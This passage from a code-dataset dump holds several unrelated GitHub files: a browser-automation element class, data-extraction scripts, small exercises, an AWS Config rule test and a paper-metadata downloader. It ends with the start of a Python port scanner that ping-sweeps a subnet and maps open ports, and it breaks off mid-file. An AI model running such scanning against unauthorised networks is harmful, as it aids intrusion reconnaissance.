defaultdict(lambda: None)\n\n for i in range(0, len(attr_list), 2):\n key = attr_list[i]\n value = attr_list[i + 1]\n attributes_dict[key] = value\n return attributes_dict\n except CDPError as e:\n if not (e.code == -32000 and e.message == 'Node is not an Element'):\n raise e\n\n async def get_dom_attribute(self, name: str) -> str or None:\n \"\"\"Gets the given attribute of the element. Unlike\n :func:`~selenium.webdriver.remote.BaseWebElement.get_attribute`, this\n method only returns attributes declared in the element's HTML markup.\n\n :Args:\n - name - Name of the attribute to retrieve.\n\n :Usage:\n ::\n\n text_length = target_element.get_dom_attribute(\"class\")\n \"\"\"\n attrs = await self.dom_attributes\n return attrs[name]\n\n async def set_dom_attribute(self, name: str, value: str):\n await self.__target__.execute_cdp_cmd(\"DOM.setAttributeValue\", {\"nodeId\": await self.node_id,\n \"name\": name, \"value\": value})\n\n async def get_attribute(self, name):\n \"\"\"Gets the given attribute or property of the element.\n\n This method will first try to return the value of a property with the\n given name. If a property with that name doesn't exist, it returns the\n value of the attribute with the same name. If there's no attribute with\n that name, ``None`` is returned.\n\n Values which are considered truthy, that is equals \"true\" or \"false\",\n are returned as booleans. All other non-``None`` values are returned\n as strings. For attributes or properties which do not exist, ``None``\n is returned.\n\n To obtain the exact value of the attribute or property,\n use :func:`~selenium.webdriver.remote.BaseWebElement.get_dom_attribute` or\n :func:`~selenium.webdriver.remote.BaseWebElement.get_property` methods respectively.\n\n :Args:\n - name - Name of the attribute/property to retrieve.\n\n Example::\n\n # Check if the \"active\" CSS class is applied to an element.\n is_active = \"active\" in target_element.get_attribute(\"class\")\n \"\"\"\n return await self.get_property(name)\n\n async def is_selected(self) -> bool:\n \"\"\"Returns whether the element is selected.\n\n Can be used to check if a checkbox or radio button is selected.\n \"\"\"\n result = await self.get_attribute(\"checked\")\n if result:\n return True\n else:\n return False\n\n async def is_enabled(self) -> bool:\n \"\"\"Returns whether the element is enabled.\"\"\"\n return not await self.get_property(\"disabled\")\n\n @property\n async def shadow_root(self):\n \"\"\"Returns a shadow root of the element if there is one or an error.\n Only works from Chromium 96, Firefox 96, and Safari 16.4 onwards.\n\n :Returns:\n - ShadowRoot object or\n - NoSuchShadowRoot - if no shadow root was attached to element\n \"\"\"\n # todo: move to CDP\n return await self.execute_script(\"return obj.ShadowRoot()\")\n\n # RenderedWebElement Items\n async def is_displayed(self) -> bool:\n \"\"\"Whether the element is visible to a user.\"\"\"\n # Only go into this conditional for browsers that don't use the atom themselves\n size = await self.size\n return not (size[\"height\"] == 0 or size[\"width\"] == 0)\n\n @property\n async def location_once_scrolled_into_view(self) -> dict:\n \"\"\"THIS PROPERTY MAY CHANGE WITHOUT WARNING. Use this to discover where\n on the screen an element is so that we can click it. This method should\n cause the element to be scrolled into view.\n\n Returns the top lefthand corner location on the screen, or zero\n coordinates if the element is not visible.\n \"\"\"\n await self.scroll_to()\n result = await self.rect\n return {\"x\": round(result[\"x\"]), \"y\": round(result[\"y\"])}\n\n async def scroll_to(self, rect: dict = None):\n args = self._args_builder\n if rect:\n args[\"rect\"] = rect\n try:\n await self.__target__.execute_cdp_cmd(\"DOM.scrollIntoViewIfNeeded\", args)\n return True\n except CDPError as e:\n if e.code == -32000 and e.message == 'Node is detached from document':\n return False\n\n @property\n async def size(self) -> dict:\n \"\"\"The size of the element.\"\"\"\n box_model = await self.box_model\n return {\"height\": box_model[\"height\"], \"width\": box_model[\"width\"]}\n\n async def value_of_css_property(self, property_name) -> str:\n \"\"\"The value of a CSS property.\"\"\"\n raise NotImplementedError(\"you might use get_attribute instead\")\n\n @property\n async def location(self) -> dict:\n \"\"\"The location of the element in the renderable canvas.\"\"\"\n result = await self.rect\n return {\"x\": round(result[\"x\"]), \"y\": round(result[\"y\"])}\n\n @property\n async def rect(self) -> dict:\n \"\"\"A dictionary with the size and location of the element.\"\"\"\n # todo: calculate form DOM.getBoxModel\n result = await self.execute_script(\"return obj.getClientRects()[0].toJSON()\", serialization=\"json\",\n unique_context=True)\n return result\n @property\n async def css_metrics(self):\n script = \"\"\"\n function getRotationAngle(target) \n {\n const _obj = window.getComputedStyle(target, null);\n const matrix = _obj.getPropertyValue('transform');\n let angle = 0; \n if (matrix !== 'none') \n {\n const values = matrix.split('(')[1].split(')')[0].split(',');\n const a = values[0];\n const b = values[1];\n angle = Math.round(Math.atan2(b, a) * (180/Math.PI));\n } \n \n return (angle < 0) ? angle +=360 : angle;\n }\n var _rects = obj.getClientRects()\n var rects = []\n for(let i = 0; i < _rects.length; i++){\n rects.push(_rects[i].toJSON())\n }\n var rotation = getRotationAngle(obj)\n return [rects, rotation]\n \"\"\"\n return await self.execute_script(script, max_depth=4)\n\n @property\n async def box_model(self):\n args = self._args_builder\n res = await self.__target__.execute_cdp_cmd(\"DOM.getBoxModel\", args)\n model = res['model']\n keys = ['content', 'padding', 'border', 'margin']\n for key in keys:\n quad = model[key]\n model[key] = np.array([[quad[0], quad[1]], [quad[2], quad[3]], [quad[4], quad[5]], [quad[6], quad[7]]])\n return model\n\n @property\n async def aria_role(self) -> str:\n \"\"\"Returns the ARIA role of the current web element.\"\"\"\n # todo: move to CDP\n return await self.get_property(\"ariaRoleDescription\")\n\n @property\n async def accessible_name(self) -> str:\n \"\"\"Returns the ARIA Level of the current webelement.\"\"\"\n # todo: move to CDP\n return await self.get_property(\"ariaLevel\")\n\n @property\n async def screenshot_as_base64(self) -> str:\n \"\"\"Gets the screenshot of the current element as a base64 encoded\n string.\n\n :Usage:\n ::\n\n img_b64 = element.screenshot_as_base64\n \"\"\"\n raise NotImplementedError()\n\n @property\n async def screenshot_as_png(self) -> bytes:\n \"\"\"Gets the screenshot of the current element as a binary data.\n\n :Usage:\n ::\n\n element_png = element.screenshot_as_png\n \"\"\"\n res = await self.screenshot_as_base64\n return b64decode(res.encode(\"ascii\"))\n\n async def screenshot(self, filename) -> bool:\n \"\"\"Saves a screenshot of the current element to a PNG image file.\n Returns False if there is any IOError, else returns True. Use full\n paths in your filename.\n\n :Args:\n - filename: The full path you wish to save your screenshot to. This\n should end with a `.png` extension.\n\n :Usage:\n ::\n\n element.screenshot('/Screenshots/foo.png')\n \"\"\"\n if not filename.lower().endswith(\".png\"):\n warnings.warn(\n \"name used for saved screenshot does not match file \" \"type. It should end with a `.png` extension\",\n UserWarning,\n )\n png = await self.screenshot_as_png\n try:\n with open(filename, \"wb\") as f:\n f.write(png)\n except OSError:\n return False\n finally:\n del png\n return True\n\n @property\n async def parent(self):\n \"\"\"The parent of this element\"\"\"\n args = {}\n if self._node_id:\n args[\"nodeId\"] = self._node_id\n else:\n args[\"objectId\"] = await self.obj_id\n node: dict = await self._describe()\n node_id = node.get(\"parentId\")\n if node_id:\n if self._loop:\n # noinspection PyUnresolvedReferences\n return SyncWebElement(node_id=node_id, target=self.__target__, context_id=self.__context_id__,\n isolated_exec_id=self.___isolated_exec_id__, frame_id=await self.__frame_id__)\n else:\n # noinspection PyUnresolvedReferences\n return WebElement(node_id=node_id, target=self.__target__, context_id=self.__context_id__,\n isolated_exec_id=self.___isolated_exec_id__, frame_id=await self.__frame_id__)\n\n @property\n def children(self):\n return self.find_elements(By.CSS_SELECTOR, \"*\")\n\n async def execute_raw_script(self, script: str, *args, await_res: bool = False, serialization: str = None,\n max_depth: int = 2, timeout: float = 2, execution_context_id: str = None,\n unique_context: bool = True):\n return await self.__exec_raw__(script, *args, await_res=await_res, serialization=serialization,\n max_depth=max_depth, timeout=timeout,\n execution_context_id=execution_context_id,\n unique_context=unique_context)\n\n async def execute_script(self, script: str, *args, max_depth: int = 2, serialization: str = None,\n timeout: float = 2, execution_context_id: str = None, unique_context: bool = True):\n return await self.__exec__(script, *args, max_depth=max_depth, serialization=serialization,\n timeout=timeout, unique_context=unique_context,\n execution_context_id=execution_context_id)\n\n async def execute_async_script(self, script: str, *args, max_depth: int = 2, serialization: str = None,\n timeout: float = 2, execution_context_id: str = None, unique_context: bool = True):\n return await self.__exec_async__(script, *args, max_depth=max_depth, serialization=serialization,\n timeout=timeout, unique_context=unique_context,\n execution_context_id=execution_context_id)\n\n def __repr__(self):\n return f'{self.__class__.__name__}(\"{self.class_name}\", obj_id={self.__obj_id__}, node_id=\"{self._node_id}\", backend_node_id={self._backend_node_id}, context_id={self.__context_id__})'\n\n def __eq__(self, other):\n if isinstance(other, WebElement):\n if other.__target__ == self.__target__:\n if other.__obj_id__ and self.__obj_id__:\n return other.__obj_id__.split(\".\")[0] == self.__obj_id__.split(\".\")[0]\n elif other._backend_node_id == self._backend_node_id:\n return True\n elif other._node_id == self._node_id:\n return True\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n","repo_name":"kaliiiiiiiiii/Selenium-Driverless","sub_path":"src/selenium_driverless/types/webelement.py","file_name":"webelement.py","file_ext":"py","file_size_in_byte":31820,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"81"} +{"seq_id":"70355102344","text":"import csv\nimport json\nimport re\n\n\ndef extract_node_ids(s):\n pattern = r'id=\"node(\\d+_\\d+)\"'\n matches = re.findall(pattern, s)\n return matches\n\n\ndef find_indexes(lst, target, current_indexes=[]):\n indexes = []\n for index, item in enumerate(lst):\n if isinstance(item, list):\n # If the item is a sublist, recursively call the function\n sub_indexes = find_indexes(item, target, current_indexes + [index])\n indexes.extend(sub_indexes)\n elif item.lower() == target:\n # If the item is the target string, add the current index\n indexes.append(current_indexes[-1])\n return list(set(indexes))\n\n\n# Read CSV file\nwith open(\"FriPa_new.csv\") as fp:\n reader = csv.reader(fp, delimiter=\",\", quotechar='\"')\n csv_FriPa = [row for row in reader]\n fripa_rows = list(reader)\n\nwith open(\"qt30.csv\") as fp:\n reader = csv.reader(fp, delimiter=\",\", quotechar='\"')\n csv_qt30 = [row for row in reader]\n\nfor i in csv_FriPa[1:]: # first two rows are examples (20.08.2023)\n date_fripa = \"cutietestrun\" + i[0].lower()\n date_fripa_s = \"cutiestestrun\" + i[0].lower() # used to search for appearances named with S\n response_part = i[4]\n response_text = i[9]\n response_json_ID = \"\"\n # looking for corpus in qt30 map\n date_indexes_qt30 = find_indexes(csv_qt30, date_fripa)\n # some of the rows have cutieStestrun in them. Next line calls a function again in that case\n if not date_indexes_qt30:\n date_indexes_qt30 = find_indexes(csv_qt30, date_fripa_s)\n for d in date_indexes_qt30:\n # search for json_ids using parts for answers\n if (csv_qt30[d][9] == response_part or csv_qt30[d][9] == \"part \" + response_part) and response_part != \"\":\n if len(csv_qt30[d][11]) <= 6: # there are texts instead of corpus numbers sometimes in the column\n json_corpus = csv_qt30[d][11]\n response_json_ID = json_corpus # writing to outer scope\n try:\n with open(\"jsons/\" + json_corpus + \".json\", encoding='utf-8-sig') as f:\n json_data = json.load(f)\n except FileNotFoundError:\n print(\"File \" + json_corpus + \" does not exist.\")\n json_text = json_data[\"text\"]\n node_list = extract_node_ids(json_text) # extracted all nodes referring to text\n relevant_nodes = []\n for node in json_data[\"AIF\"][\"nodes\"]:\n if node[\"nodeID\"] in node_list:\n regex = re.findall(r'^(?:[^:]*:)?\\s*(?:[^:]*:)?\\s*(.+)$', node[\"text\"])[0]\n # the RegEx will look for the text after a colon, so that the name of the speaker is omited\n # in some instances this will skip some of the text before the colon, but that should not pose an issue\n if len(regex.split()) > 3:\n regex = regex.split(' ', 1)[1]\n if regex in response_text:\n relevant_nodes.append(node[\"nodeID\"])\n i[11] = str(relevant_nodes)\n\nwith open('FriPa_new_dub.csv', 'w', newline='', encoding='utf-8') as f:\n csv_writer = csv.writer(f)\n csv_writer.writerows(csv_FriPa)\n","repo_name":"SeanEmanon/spansExtractor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18225962683","text":"def solution(num,triangle):\n n=int((num/3)//2)\n if n==0 :\n return triangle\n else :\n triangle=solution(num//2,triangle)\n for i in range(num//2):\n triangle.append(triangle[i]+\" \"+triangle[i])\n triangle[i]=\" \"*(num//2)+triangle[i]+\" \"*(num//2)\n return triangle\n \ntriangle=[\" * \",\" * * \",\"*****\"]# 각각 \" \"*n+triangle+triangle+\" \"*(num-1-2*줄수)+triangle\nnum = int(input())\nfor i in solution(num,triangle):\n print(i)\n\n\n# 어떤 입력이 주어지는지 확인하고 문제를 풀어야 한다.\n# 나는 입력이 3*2^k가 아닌 정수를 받아 그 수만큼 출력하는 줄 알고 풀었다. 덕분에 많은 시간을 소요했다.\n# 그 개고생이 바로 밑의 코드이다.\n\n# def triangle (n, k, spacestart, nextspace):\n# if n!=1 :\n# spacestart, nextspace = triangle (n-1,k,spacestart,nextspace)\n# array=[1,2,2,4]\n\n# if n == spacestart :\n# spacestart = 2*(spacestart-1)+1\n# nextspace = spacestart-2\n# else :\n# nextspace-=2\n\n# # if (n+2)%3 == 0 :\n# # f.write((\" \"*(k-n))+(\"*\"+\" \"*nextspace)*((n-1)//12+1)*array[((n-1)//3)%4]+\"\\n\")\n# # elif (n+1)%3 == 0 :\n# # f.write((\" \"*(k-n))+(\"* *\"+\" \"*nextspace)*((n-1)//12+1)*array[((n-1)//3)%4]+\"\\n\")\n# # elif n%3 ==0 :\n# # f.write((\" \"*(k-n))+(\"*****\"+\" \"*nextspace)*((n-1)//12+1)*array[((n-1)//3)%4]+\"\\n\")\n# print(\" \"*(k-n), end=\" \")\n# quarter=(n-1)//12+1\n# if (n+2)%3 == 0 :\n# for i in range(quarter):\n# print((\"*\"+\" \"*(nextspace if quarter%2!=0 or n<=12 else nextspace-12*(quarter-1)))*array[((n-1)//3)%4],end=\"\")\n# print(\"\")\n# elif (n+1)%3 == 0 :\n# for i in range(quarter):\n# print((\"* *\"+\" \"*nextspace)*array[((n-1)//3)%4],end=\"\")\n# print(\"\")\n# elif n%3 ==0 :\n# for i in range(quarter):\n# print((\"*****\"+\" \"*nextspace)*array[((n-1)//3)%4],end=\"\")\n# print(\"\")\n# return (spacestart,nextspace)\n\n# n = int(input())\n# # f = open(\"output.txt\", 'w')\n# # triangle(n,n,4,-1,f)\n# # f.close()\n# triangle(n,n,4,-1)\n","repo_name":"HorangApple/TIL","sub_path":"Algorithm/Baekjoon/2448_별 찍기-11.py","file_name":"2448_별 찍기-11.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"45889820456","text":"class Solution:\n def countPrimes(self, n: int) -> int:\n total = 0\n prime = [False, False] + [True] * (n-2)\n\n for i in range(2, n):\n if prime[i]:\n for j in range(i*2, n, i):\n prime[j] = False\n\n\n return sum(prime)\n \n","repo_name":"xgfelicia/general-coding-practice","sub_path":"python3/count-primes.py","file_name":"count-primes.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73114779465","text":"#\n# This file made available under CC0 1.0 Universal (https://creativecommons.org/publicdomain/zero/1.0/legalcode)\n#\n# Created with the Rule Development Kit: https://github.com/awslabs/aws-config-rdk\n# Can be used stand-alone or with the Rule Compliance Engine: https://github.com/awslabs/aws-config-engine-for-compliance-as-code\n#\n\nimport unittest\nfrom unittest.mock import patch, MagicMock\nfrom botocore.exceptions import ClientError\nimport rdklib\nfrom rdklib import Evaluation, ComplianceType\nfrom rdklibtest import assert_successful_evaluation\n\n#############\n# Main Code #\n#############\n\nMODULE = __import__('AMI_DEPRECATED_CHECK')\nRULE = MODULE.AMI_DEPRECATED_CHECK()\n\n#example for mocking S3 API calls\nCLIENT_FACTORY = MagicMock()\nEC2_CLIENT_MOCK = MagicMock()\nASG_CLIENT_MOCK = MagicMock()\n\ndef mock_get_client(client_name, *args, **kwargs):\n if client_name == \"ec2\":\n return EC2_CLIENT_MOCK\n elif client_name == 'autoscaling':\n return ASG_CLIENT_MOCK\n raise Exception(\"Attempting to create an unknown client\")\n\n\ndef mock_evaluator_handle(event, context):\n return f\"Event: {event} - Context: {context}\"\n\n\n@patch.object(CLIENT_FACTORY, \"build_client\", MagicMock(side_effect=mock_get_client))\nclass ComplianceTest(unittest.TestCase):\n\n deprecated_ami_response = {\n \"Images\": [\n {\n \"CreationDate\": \"2021-07-19T19:03:00.000Z\",\n \"ImageId\": \"ami-abcd1234\",\n \"Name\": \"test-image\",\n \"DeprecationTime\": \"2021-07-21T17:03:00.000Z\"\n }\n ]\n }\n\n compliant_ami_response = {\n \"Images\": [\n {\n \"CreationDate\": \"2021-07-01T19:03:00.000Z\",\n \"ImageId\": \"ami-abcd1234\",\n \"Name\": \"test-image\"\n }\n ]\n }\n\n missing_ami_response = {'Images': []}\n\n instance_response = {\n \"Reservations\": [\n {\n \"Groups\": [],\n \"Instances\": [\n {\n \"ImageId\": \"ami-abcd1234\",\n \"InstanceId\": \"i-abcd1234\"\n }\n ]\n }\n ]\n }\n\n asg_launch_template = {\n \"AutoScalingGroups\": [\n {\n \"AutoScalingGroupName\": \"test-asg\",\n \"LaunchTemplate\": {\n \"LaunchTemplateId\": \"lt-xyz789\",\n \"LaunchTemplateName\": \"test-lt\",\n \"Version\": \"1\"\n }\n }\n ]\n }\n\n asg_mixed_instances = {\n \"AutoScalingGroups\": [\n {\n \"AutoScalingGroupName\": \"test-asg\",\n \"MixedInstancesPolicy\": {\n \"LaunchTemplate\": {\n \"LaunchTemplateSpecification\": {\n \"LaunchTemplateId\": \"lt-xyz789\",\n \"LaunchTemplateName\": \"test-lt\",\n \"Version\": 1\n }\n }\n }\n }\n ]\n }\n\n asg_launch_config = {\n \"AutoScalingGroups\": [\n {\n \"AutoScalingGroupName\": \"test-asg\",\n \"LaunchConfigurationName\": \"test-lc\"\n }\n ]\n }\n\n launch_template_versions = {\n 'LaunchTemplateVersions': [\n {\n 'LaunchTemplateData': {\n 'ImageId': 'ami-6057e21a'\n },\n 'LaunchTemplateId': \"lt-xyz789\",\n 'LaunchTemplateName': \"test-lt\",\n 'VersionNumber': 2,\n }\n ]\n }\n\n launch_config = {\n \"LaunchConfigurations\": [\n {\n \"LaunchConfigurationName\": \"test-lc\",\n \"ImageId\": \"ami-abcd1234\"\n }\n ]\n }\n\n def setUp(self):\n EC2_CLIENT_MOCK.reset_mock()\n ASG_CLIENT_MOCK.reset_mock()\n\n def test_evaluate_compliant_instance(self):\n EC2_CLIENT_MOCK.describe_instances.return_value = self.instance_response\n EC2_CLIENT_MOCK.describe_images.return_value = self.compliant_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'EC2'})\n instance = self.instance_response['Reservations'][0]['Instances'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.COMPLIANT,\n resourceId=instance['InstanceId'],\n resourceType='AWS::EC2::Instance',\n annotation=f'Image {instance[\"ImageId\"]} is not deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_instance_deprecated_ami(self):\n EC2_CLIENT_MOCK.describe_instances.return_value = self.instance_response\n EC2_CLIENT_MOCK.describe_images.return_value = self.deprecated_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'EC2'})\n instance = self.instance_response['Reservations'][0]['Instances'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=instance['InstanceId'],\n resourceType='AWS::EC2::Instance',\n annotation=f'Image {instance[\"ImageId\"]} is deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_instance_missing_ami(self):\n EC2_CLIENT_MOCK.describe_instances.return_value = self.instance_response\n EC2_CLIENT_MOCK.describe_images.return_value = self.missing_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'EC2'})\n instance = self.instance_response['Reservations'][0]['Instances'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=instance['InstanceId'],\n resourceType='AWS::EC2::Instance',\n annotation=f'Error checking {instance[\"ImageId\"]}, assuming noncompliant'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_asg_mixed_instances_launch_template_compliant(self):\n ASG_CLIENT_MOCK.describe_auto_scaling_groups.return_value = self.asg_mixed_instances\n EC2_CLIENT_MOCK.describe_launch_template_versions.return_value = self.launch_template_versions\n EC2_CLIENT_MOCK.describe_images.return_value = self.compliant_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'ASG'})\n asg = self.asg_mixed_instances['AutoScalingGroups'][0]\n launch_template_version = self.launch_template_versions['LaunchTemplateVersions'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.COMPLIANT,\n resourceId=asg['AutoScalingGroupName'],\n resourceType='AWS::AutoScaling::AutoScalingGroup',\n annotation=f'Image {launch_template_version[\"LaunchTemplateData\"][\"ImageId\"]} is not deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_asg_launch_config_deprecated_ami(self):\n ASG_CLIENT_MOCK.describe_auto_scaling_groups.return_value = self.asg_launch_config\n ASG_CLIENT_MOCK.describe_launch_configurations.return_value = self.launch_config\n EC2_CLIENT_MOCK.describe_images.return_value = self.deprecated_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'ASG'})\n asg = self.asg_launch_config['AutoScalingGroups'][0]\n launch_config = self.launch_config['LaunchConfigurations'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=asg['AutoScalingGroupName'],\n resourceType='AWS::AutoScaling::AutoScalingGroup',\n annotation=f'Image {launch_config[\"ImageId\"]} is deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_asg_launch_template_missing_ami(self):\n ASG_CLIENT_MOCK.describe_auto_scaling_groups.return_value = self.asg_launch_template\n ASG_CLIENT_MOCK.describe_launch_template_versions.return_value = self.launch_template_versions\n EC2_CLIENT_MOCK.describe_images.return_value = self.missing_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'ASG'})\n asg = self.asg_launch_template['AutoScalingGroups'][0]\n launch_template_version = self.launch_template_versions['LaunchTemplateVersions'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=asg['AutoScalingGroupName'],\n resourceType='AWS::AutoScaling::AutoScalingGroup',\n annotation=f'Error checking {launch_template_version[\"LaunchTemplateData\"][\"ImageId\"]}, assuming noncompliant'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"awslabs/aws-config-rules","sub_path":"python-rdklib/AMI_DEPRECATED_CHECK/AMI_DEPRECATED_CHECK_test.py","file_name":"AMI_DEPRECATED_CHECK_test.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","stars":1509,"dataset":"github-code","pt":"81"} +{"seq_id":"593948714","text":"import re\nfrom typing import Any, ClassVar, Dict, Optional\n\nimport papis.downloaders.base\n\n\nclass Downloader(papis.downloaders.Downloader):\n DOCUMENT_URL: ClassVar[str] = \"https://annualreviews.org/doi/pdf/{doi}\"\n\n BIBTEX_URL: ClassVar[str] = (\n \"https://annualreviews.org/action/downloadCitation\"\n \"?format=bibtex&cookieSet=1&doi={doi}\"\n )\n\n def __init__(self, url: str) -> None:\n super().__init__(\n url, \"annualreviews\",\n expected_document_extension=\"pdf\",\n priority=10,\n )\n\n @classmethod\n def match(cls, url: str) -> Optional[papis.downloaders.Downloader]:\n if re.match(r\".*annualreviews.org.*\", url):\n return Downloader(url)\n else:\n return None\n\n def get_document_url(self) -> Optional[str]:\n if \"doi\" in self.ctx.data:\n url = self.DOCUMENT_URL.format(doi=self.ctx.data[\"doi\"])\n self.logger.debug(\"Using document URL: '%s'.\", url)\n\n return url\n else:\n return None\n\n def get_bibtex_url(self) -> Optional[str]:\n if \"doi\" in self.ctx.data:\n url = self.BIBTEX_URL.format(doi=self.ctx.data[\"doi\"])\n self.logger.debug(\"Using BibTeX URL: '%s'.\", url)\n\n return url\n else:\n return None\n\n def get_data(self) -> Dict[str, Any]:\n data = {}\n soup = self._get_soup()\n data.update(papis.downloaders.base.parse_meta_headers(soup))\n\n if \"author_list\" in data:\n return data\n\n cleanregex = re.compile(r\"(^\\s*|\\s*$|&)\")\n editorregex = re.compile(r\"([\\n|]|\\(Reviewing\\s*Editor\\))\")\n morespace = re.compile(r\"\\s+\")\n\n # Read brute force the authors from the source\n author_list = []\n authors = soup.find_all(name=\"span\", attrs={\"class\": \"contribDegrees\"})\n\n for author in authors:\n affspan = author.find_all(\"span\", attrs={\"class\": \"overlay\"})\n afftext = affspan[0].text if affspan else \"\"\n fullname = re.sub(\n \",\", \"\", cleanregex.sub(\"\", author.text.replace(afftext, \"\")))\n split_fullname = re.split(r\"\\s+\", fullname)\n cafftext = re.sub(\" ,\", \",\",\n morespace.sub(\" \", cleanregex.sub(\"\", afftext)))\n\n if \"Reviewing Editor\" in fullname:\n data[\"editor\"] = cleanregex.sub(\n \" \", editorregex.sub(\"\", fullname))\n continue\n\n given = split_fullname[0]\n family = \" \".join(split_fullname[1:])\n author_list.append({\n \"given\": given,\n \"family\": family,\n \"affiliation\": [{\"name\": cafftext}] if cafftext else []\n }\n )\n\n data[\"author_list\"] = author_list\n data[\"author\"] = papis.document.author_list_to_author(data)\n\n return data\n","repo_name":"papis/papis","sub_path":"papis/downloaders/annualreviews.py","file_name":"annualreviews.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":1237,"dataset":"github-code","pt":"81"} +{"seq_id":"11875685145","text":"st_name = ['송지우', '심현준', '윤호민']\r\nst_score = [93, 78, 89]\r\n\r\n\r\nfor i in range(len(st_name)):\r\n name = st_name[i]\r\n score = st_score[i]\r\n \r\n if score >= 90:\r\n grade = 'A'\r\n elif score >= 80:\r\n grade = 'B'\r\n elif score >= 70:\r\n grade = 'C'\r\n elif score >= 60:\r\n grade = 'D'\r\n else:\r\n grade = 'F'\r\n \r\n print(f\"-{name}- 학점: {grade}\")\r\n","repo_name":"joohyoengjin/JHJ_WEB","sub_path":"VSpython/Trading/학점구하기.py","file_name":"학점구하기.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33569461750","text":"import socket\nimport subprocess\nfrom tqdm import tqdm\nimport os\nimport time\nimport pyfiglet\nfrom termcolor import colored\n\n# --------------------------------------------------------------------------------\n# FUNÇÕES\n# --------------------------------------------------------------------------------\n\ndef inicio():\n texto = \"\\n PORT SCANNER\"\n titulo = pyfiglet.figlet_format(texto, font=\"slant\")\n\n colored_ascii_banner = colored(titulo, 'green')\n print(colored_ascii_banner)\n print(\"\\033[1;32m-\\033[00m\"*50)\n print(\" \"*12 + \"\\033[1;32mBEM VINDO AO PORT SCANNER\\033[00m\" + \" \"*12)\n print(\"\\033[1;32m-\\033[00m\"*50 + \"\\n\")\n\n time.sleep(1)\n print(\"Carregando mapa de rede...\\n\")\n time.sleep(1)\n\n #get_ip()\n\n ip = input(\"Digite o IP desejado: \\n\")\n\n if ip == \"\":\n print(\"\\033[31mDigite um IP válido\\033[00m\\n\")\n inicio()\n\n ports_input = input(\"Digite o RANGE de portas separado por uma vírgula | Digite uma única porta | ENTER para mapear todas: \\n\")\n\n if ports_input == \"\":\n ports = list(range(1, 65536))\n elif \",\" in ports_input:\n start, end = map(int, ports_input.split(\",\"))\n ports = list(range(start, end + 1))\n else:\n ports = [int(ports_input)]\n\n ports_map(ports, ip)\n\ndef get_ip():\n os.system(\"clear\")\n\n print(\"\\033[1;32m-\\033[00m\"*50)\n print(\" \"*12 + \"\\033[1;32mBEM VINDO AO PORT SCANNER\\033[00m\" + \" \"*12)\n print(\"\\033[1;32m-\\033[00m\"*50 + \"\\n\")\n\n time.sleep(1)\n\n print(\"\\033[95m-\\033[00m\"*30)\n print(\" \"*6 + \"\\033[95mMAPEAMENTO DA REDE\\033[00m\" + \" \"*6)\n print(\"\\033[95m-\\033[00m\"*30 + \"\\n\")\n\n time.sleep(1)\n\n fix_ip = input(\"Digite os 3 primeiros números do endereço IP da rede (ex: 192.168.3): \\n\")\t\n\n ips = [fix_ip + '.' + str(i) for i in range(1, 255)]\n\n available_ips = []\n\n for ip in tqdm(ips, desc=\"Verificando IPs\"):\n response = subprocess.run(['ping', '-c', '1', '-w', '1', ip], stdout=subprocess.DEVNULL)\n if response.returncode == 0:\n available_ips.append(ip)\n\n print(\"IPs disponíveis: \" + str(len(available_ips)) + \"\\n\")\n\n for ip in available_ips:\n print(ip + \" está disponível\")\n\ndef ports_map(ports, ip):\n well_known_ports = {\n 20: 'FTP (File Transfer Protocol)',\n 21: 'FTP (File Transfer Protocol)',\n 22: 'SSH (Secure Shell)',\n 23: 'Telnet',\n 25: 'SMTP (Simple Mail Transfer Protocol)',\n 53: 'DNS (Domain Name System)',\n 80: 'HTTP (Hypertext Transfer Protocol)',\n 110: 'POP3 (Post Office Protocol version 3)',\n 119: 'NNTP (Network News Transfer Protocol)',\n 123: 'NTP (Network Time Protocol)',\n 143: 'IMAP (Internet Message Access Protocol)',\n 161: 'SNMP (Simple Network Management Protocol)',\n 194: 'IRC (Internet Relay Chat)',\n 443: 'HTTPS (HTTP Secure)',\n 445: 'SMB (Server Message Block)',\n 465: 'SMTPS (Simple Mail Transfer Protocol Secure)',\n 514: 'Syslog',\n 587: 'SMTP (Mail Submission)',\n 631: 'IPP (Internet Printing Protocol)',\n 873: 'rsync',\n 993: 'IMAPS (Internet Message Access Protocol Secure)',\n 995: 'POP3S (Post Office Protocol version 3 Secure)',\n 1080: 'SOCKS 